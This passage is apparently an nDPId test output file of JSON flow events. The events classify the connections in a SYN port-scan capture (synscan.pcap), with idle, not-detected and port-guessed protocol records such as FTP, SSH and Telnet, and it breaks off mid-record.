-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":827,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32782,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49167,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1049,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32783,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32784,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061172,"flow_last_seen":1278275061172,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":289,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32785,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":331,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1320,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"FTP_DATA","breed":"Acceptable","category":"Download"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1425,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060597,"flow_last_seen":1278275060597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056340,"flow_last_seen":1278275056340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00736{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"","server_signature":"","hassh_client":"","hassh_server":""}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1278275057678,"flow_last_seen":1278275079360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"","password":"","auth_failed":0}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057477,"flow_last_seen":1278275057477,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1443,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49175,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00805{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056466,"flow_last_seen":1278275056466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by 